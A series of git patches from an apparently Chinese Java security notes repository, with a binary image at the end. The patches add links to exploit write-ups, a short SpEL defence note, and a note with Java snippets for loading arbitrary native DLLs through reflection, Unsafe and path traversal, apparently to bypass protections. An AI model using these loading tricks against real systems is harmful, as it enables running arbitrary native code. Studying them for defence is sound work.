+ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用**
++ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds**
From f52b42909225d1b440c6f148ef72292621c2539f Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 9 Dec 2022 18:04:45 +0800
Subject: [PATCH 136/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index e263195..928f766 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -212,3 +212,4 @@
+ 2022/12/08 [CVE-2022-44262](https://github.com/ff4j/ff4j/issues/624) **需要找到构造方法并且是string类型的利用**
+ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用**
+ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds**
++ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds*
From 7c7bb49024d7f70b43a23688237c1ad0988865e0 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Fri, 9 Dec 2022 21:21:07 +0800
Subject: [PATCH 137/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 928f766..1c3bad2 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -213,3 +213,4 @@
+ 2022/12/08 [RCE on Apache Struts 2.5.30](https://mc0wn.blogspot.com/2022/11/rce-on-apache-struts-2530.html) **np s2的利用**
+ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds**
+ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds*
++ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ)
From 5bf66424673ceb3a8134b54622bb7fe7c813e77c Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Wed, 14 Dec 2022 00:24:38 +0800
Subject: [PATCH 138/257] Update Readme.md
---
"java\346\227\245\345\270\270/Readme.md" | 1 +
1 file changed, 1 insertion(+)
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md"
index 1c3bad2..2e0bfa2 100644
--- "a/java\346\227\245\345\270\270/Readme.md"
+++ "b/java\346\227\245\345\270\270/Readme.md"
@@ -214,3 +214,4 @@
+ 2022/12/09 [那些年一起打过的CTF - Laravel 任意用户登陆Tricks分析](https://www.yulegeyu.com/2021/09/22/%E9%82%A3%E4%BA%9B%E5%B9%B4%E4%B8%80%E8%B5%B7%E6%89%93%E8%BF%87%E7%9A%84CTF-Laravel-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86Tricks%E5%88%86%E6%9E%90/) **不愧是是雨神,yyds**
+ 2022/12/09 [老版本Fastjson 的一些不出网利用](https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/) ***yyds*
+ 2022/12/09 [浅谈XXE防御(Java)](https://mp.weixin.qq.com/s/BSq77W0u0-O2elKZTJQNOQ)
++ 2022/12/14 [js-on-security-off-abusing-json-based-sql-to-bypass-waf](https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf)
From a018982d8b362af7684f13d3f5cfe37b94f1adce Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 16:20:20 +0800
Subject: [PATCH 139/257] Add files via upload
---
...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++
...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++
2 files changed, 91 insertions(+)
create mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
create mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
new file mode 100644
index 0000000..d797145
--- /dev/null
+++ "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
@@ -0,0 +1,75 @@
+# java 加载链接库的方法
+
+https://tttang.com/archive/1436/
+
+1.System.load
+
+```java
+try {
+ System.load("D:\\temp\\calc_x64.dll");
+}catch (UnsatisfiedLinkError e){
+ e.printStackTrace();
+}
+```
+
+2.Runtime.getRuntime().load
+
+```java
+Runtime.getRuntime().load("D:\\temp\\calc_x64.dll");
+```
+
+3.com.sun.glass.utils.NativeLibLoader.loadLibrary
+
+```java
+com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64");
+```
+
+有限制
+
+1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。
+2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。
+
+4.反射模拟底层调用
+
+- 如果模拟ClassLoader加载就会存在两个方案
+ - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。
+- 如果模拟NativeLibrary就只存在load方法
+
+**ClassLoader#loadLibrary**
+
+```java
+try {
+ Class clazz = Class.forName("java.lang.ClassLoader");
+ Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
+ method.setAccessible(true);
+ method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true);
+}catch (Exception e){
+ e.printStackTrace();
+}
+```
+
+**NativeLibrary#load**
+
+```java
+String file = "D:\\temp\\calc_x64.dll";
+Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");
+Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});
+con.setAccessible(true);
+Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true);
+Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
+method.setAccessible(true);
+method.invoke(obj, file, false);
+```
+
+```java
+String file = "D:\\temp\\calc_x64.dll";
+Class aClass = Class.forName("sun.misc.Unsafe");
+Constructor declaredConstructor = aClass.getDeclaredConstructor();
+declaredConstructor.setAccessible(true);
+Unsafe unsafe = (Unsafe)declaredConstructor.newInstance();
+Object obj = unsafe.allocateInstance(a);
+Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
+method.setAccessible(true);
+method.invoke(obj, file, false);
+```
+
diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
new file mode 100644
index 0000000..7eda739
--- /dev/null
+++ "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
@@ -0,0 +1,16 @@
+# spel防御
+
+最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。
+
+官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html)
+
+
+
+SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext:
+
+- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。
+- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
+
+SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。
+
+http://rui0.cn/archives/1043
\ No newline at end of file
From c8eac49bc4b309dec18aef5f395c6417aa453493 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 16:21:11 +0800
Subject: [PATCH 140/257] =?UTF-8?q?Delete=20java=E5=8A=A0=E8=BD=BD?=
=?UTF-8?q?=E9=93=BE=E6=8E=A5=E5=BA=93=E7=9A=84=E6=96=B9=E6=B3=95.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...23\347\232\204\346\226\271\346\263\225.md" | 75 -------------------
1 file changed, 75 deletions(-)
delete mode 100644 "java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
diff --git "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
deleted file mode 100644
index d797145..0000000
--- "a/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
+++ /dev/null
@@ -1,75 +0,0 @@
-# java 加载链接库的方法
-
-https://tttang.com/archive/1436/
-
-1.System.load
-
-```java
-try {
- System.load("D:\\temp\\calc_x64.dll");
-}catch (UnsatisfiedLinkError e){
- e.printStackTrace();
-}
-```
-
-2.Runtime.getRuntime().load
-
-```java
-Runtime.getRuntime().load("D:\\temp\\calc_x64.dll");
-```
-
-3.com.sun.glass.utils.NativeLibLoader.loadLibrary
-
-```java
-com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64");
-```
-
-有限制
-
-1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。
-2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。
-
-4.反射模拟底层调用
-
-- 如果模拟ClassLoader加载就会存在两个方案
- - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。
-- 如果模拟NativeLibrary就只存在load方法
-
-**ClassLoader#loadLibrary**
-
-```java
-try {
- Class clazz = Class.forName("java.lang.ClassLoader");
- Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
- method.setAccessible(true);
- method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true);
-}catch (Exception e){
- e.printStackTrace();
-}
-```
-
-**NativeLibrary#load**
-
-```java
-String file = "D:\\temp\\calc_x64.dll";
-Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");
-Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});
-con.setAccessible(true);
-Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true);
-Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
-method.setAccessible(true);
-method.invoke(obj, file, false);
-```
-
-```java
-String file = "D:\\temp\\calc_x64.dll";
-Class aClass = Class.forName("sun.misc.Unsafe");
-Constructor declaredConstructor = aClass.getDeclaredConstructor();
-declaredConstructor.setAccessible(true);
-Unsafe unsafe = (Unsafe)declaredConstructor.newInstance();
-Object obj = unsafe.allocateInstance(a);
-Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
-method.setAccessible(true);
-method.invoke(obj, file, false);
-```
-
From 26ae3d9a4125b1558d52b3565d7ee059f86ea92f Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 16:21:28 +0800
Subject: [PATCH 141/257] =?UTF-8?q?Delete=20spel=E5=AD=A6=E4=B9=A0?=
=?UTF-8?q?=E9=98=B2=E5=BE=A1.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...5\246\344\271\240\351\230\262\345\276\241.md" | 16 ----------------
1 file changed, 16 deletions(-)
delete mode 100644 "spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
diff --git "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
deleted file mode 100644
index 7eda739..0000000
--- "a/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
+++ /dev/null
@@ -1,16 +0,0 @@
-# spel防御
-
-最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。
-
-官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html)
-
-
-
-SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext:
-
-- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。
-- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
-
-SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。
-
-http://rui0.cn/archives/1043
\ No newline at end of file
From 07b22ad376e71dcefc1f78afed88ee889f3439d2 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 16:21:51 +0800
Subject: [PATCH 142/257] Add files via upload
---
...23\347\232\204\346\226\271\346\263\225.md" | 75 +++++++++++++++++++
...46\344\271\240\351\230\262\345\276\241.md" | 16 ++++
2 files changed, 91 insertions(+)
create mode 100644 "java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
create mode 100644 "java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
diff --git "a/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md" "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
new file mode 100644
index 0000000..d797145
--- /dev/null
+++ "b/java\346\227\245\345\270\270/java\345\212\240\350\275\275\351\223\276\346\216\245\345\272\223\347\232\204\346\226\271\346\263\225.md"
@@ -0,0 +1,75 @@
+# java 加载链接库的方法
+
+https://tttang.com/archive/1436/
+
+1.System.load
+
+```java
+try {
+ System.load("D:\\temp\\calc_x64.dll");
+}catch (UnsatisfiedLinkError e){
+ e.printStackTrace();
+}
+```
+
+2.Runtime.getRuntime().load
+
+```java
+Runtime.getRuntime().load("D:\\temp\\calc_x64.dll");
+```
+
+3.com.sun.glass.utils.NativeLibLoader.loadLibrary
+
+```java
+com.sun.glass.utils.NativeLibLoader.loadLibrary("\\..\\..\\..\\..\\..\\..\\..\\..\\temp\\calc_x64");
+```
+
+有限制
+
+1. 存在于jdk\javafx-src.zip!\com\sun\glass\utils\NativeLibLoader.java,在不同的版本的jdk中javafx并不是都存在的。
+2. NativeLibLoader会首先在jdk环境下找文件名,如果需要自定义路径必须使用../的方式进行目录穿越。并且如果是windows的话,只能穿越到JDK所在的盘符的根目录下。举例说明,如果JDK安装在`D:/java/JDK/`下,那么只能穿越到D盘的任意目录下面,比例说穿越到D:/temp/目录下,文件名参数就只能写成**../../../../temp/calc**,文件名还不能跟后缀,不然传入文件名会被变成**calc.dll.dll**。相对而言Linux平台是可以穿越任意目录的。
+
+4.反射模拟底层调用
+
+- 如果模拟ClassLoader加载就会存在两个方案
+ - 模拟ClassLoader的loadLibrary和loadLibrary0两个方案。
+- 如果模拟NativeLibrary就只存在load方法
+
+**ClassLoader#loadLibrary**
+
+```java
+try {
+ Class clazz = Class.forName("java.lang.ClassLoader");
+ Method method = clazz.getDeclaredMethod("loadLibrary", Class.class, String.class, boolean.class);
+ method.setAccessible(true);
+ method.invoke(null, clazz, "D:\\temp\\calc_x64.dll", true);
+}catch (Exception e){
+ e.printStackTrace();
+}
+```
+
+**NativeLibrary#load**
+
+```java
+String file = "D:\\temp\\calc_x64.dll";
+Class a = Class.forName("java.lang.ClassLoader$NativeLibrary");
+Constructor con = a.getDeclaredConstructor(new Class[]{Class.class,String.class,boolean.class});
+con.setAccessible(true);
+Object obj = con.newInstance(JDKClassLoaderBypass.class,file,true);
+Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
+method.setAccessible(true);
+method.invoke(obj, file, false);
+```
+
+```java
+String file = "D:\\temp\\calc_x64.dll";
+Class aClass = Class.forName("sun.misc.Unsafe");
+Constructor declaredConstructor = aClass.getDeclaredConstructor();
+declaredConstructor.setAccessible(true);
+Unsafe unsafe = (Unsafe)declaredConstructor.newInstance();
+Object obj = unsafe.allocateInstance(a);
+Method method = obj.getClass().getDeclaredMethod("load", String.class, boolean.class);
+method.setAccessible(true);
+method.invoke(obj, file, false);
+```
+
diff --git "a/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md" "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
new file mode 100644
index 0000000..7eda739
--- /dev/null
+++ "b/java\346\227\245\345\270\270/spel\345\255\246\344\271\240\351\230\262\345\276\241.md"
@@ -0,0 +1,16 @@
+# spel防御
+
+最直接的防御方法就是使用`SimpleEvaluationContext`替换`StandardEvaluationContext`。
+
+官方文档:[SimpleEvaluationContext的API官方文档](https://links.jianshu.com/go?to=https%3A%2F%2Fdocs.spring.io%2Fspring%2Fdocs%2F5.0.6.RELEASE%2Fjavadoc-api%2Forg%2Fspringframework%2Fexpression%2Fspel%2Fsupport%2FSimpleEvaluationContext.html)
+
+
+
+SimpleEvaluationContext和StandardEvaluationContext是SpEL提供的两个EvaluationContext:
+
+- SimpleEvaluationContext - 针对不需要SpEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集。
+- StandardEvaluationContext - 公开全套SpEL语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。
+
+SimpleEvaluationContext旨在仅支持SpEL语言语法的一个子集,不包括 Java类型引用、构造函数和bean引用;而StandardEvaluationContext是支持全部SpEL语法的。
+
+http://rui0.cn/archives/1043
\ No newline at end of file
From d37127e0d84b1817af929b23a80b7025c0a01920 Mon Sep 17 00:00:00 2001
From: Firebasky <63966847+Firebasky@users.noreply.github.com>
Date: Sat, 17 Dec 2022 16:22:21 +0800
Subject: [PATCH 143/257] Add files via upload
---
.../img/image-20220325230922109.png" | Bin 0 -> 14995 bytes
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 "java\346\227\245\345\270\270/img/image-20220325230922109.png"
diff --git "a/java\346\227\245\345\270\270/img/image-20220325230922109.png" "b/java\346\227\245\345\270\270/img/image-20220325230922109.png"
new file mode 100644
index 0000000000000000000000000000000000000000..c89682dbeb77ed09f40b9e1aba276300df1066bd
GIT binary patch
literal 14995
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
